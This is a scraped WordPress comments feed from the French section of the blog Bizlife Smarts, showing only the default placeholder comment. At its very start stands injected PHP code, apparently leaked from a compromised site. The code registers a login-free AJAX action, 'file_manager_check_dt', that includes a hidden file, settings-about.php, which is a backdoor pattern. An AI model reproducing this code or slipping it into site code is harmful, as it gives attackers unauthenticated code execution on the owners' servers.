if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } Commentaires pour Bizlife Smarts https://bizlifesmarts.com/fr/ Uncommon sense Fri, 26 Mar 2021 18:33:09 +0000 hourly 1 Commentaires sur Things I learned at 40 that I wish I had been taught by 20. par A WordPress Commenter https://bizlifesmarts.com/fr/2018/05/30/20ratherthan40/#comment-1 Wed, 30 May 2018 16:50:13 +0000 http:/?p=1#comment-1 Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.

]]>